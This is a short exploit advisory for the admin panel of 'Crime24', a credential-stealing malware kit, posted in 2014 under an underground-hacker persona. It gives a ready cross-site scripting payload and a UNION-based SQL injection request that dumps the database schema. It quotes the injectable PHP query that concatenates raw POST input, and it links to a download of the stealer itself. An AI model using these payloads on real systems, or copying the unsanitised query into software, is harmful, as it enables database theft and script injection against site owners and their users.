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Crime24 Stealer Panel

An attacker can execute an XSS and inject sql commands in the search form.

Usage info:
You must be logged in the admin panel.

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#     #CyberNinja | My katana can slay any security!
#         >> Twitter @TheHackersBay
#             >> Pentester / Underground hacker
# Exploit Title: Crime24 Stealer Panel <= Multiple Vulnerabilities
# Date: Sunday May 3 2014
# Exploit Author: Daisuke Dan
# Vendor Homepage: Crime24.net
# Download link (v.1): http://thehackersbay.org/blog/patch/Crime24-Stealer.rar
# Version: v.1
# Tested on: Windows Seven
# Patched Version (v.2): http://thehackersbay.org/blog/2014/05/03/crime24-stealer-panel/
#=========================== EXPLOITATION ==============================
0x01 Detecting the error
POST: http://site.com/?action=search
POST Content: q='"><img+src=x+onerror=prompt('DaisukeDan');>&in=1&search=Search
Example: http://i.imgur.com/zyIr5xv.png
Result: Cross site scripting + SQL error
0x02 Exploit the SQL Injection
[+] Vulnerable code:
$result= mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);
POST: http://site.com/?action=search                   
POST Content:
q=' union select 1,2,group_concat(column_name,0x0a),4,5,6,7,8 from information_schema.columns where table_name=0x6c6f6773-- -
Example: http://i.imgur.com/t4ydLsR.png
You have access to all the database.
#=========================== Gr33tz =============================#
| Raw-x | eth0 | Downfall | XzLt | Insider | rootaccess | Yasker |
| EZiX | Negative | ajkaro | Un0wn_X | H4T | NeTwork | Pent0thal |

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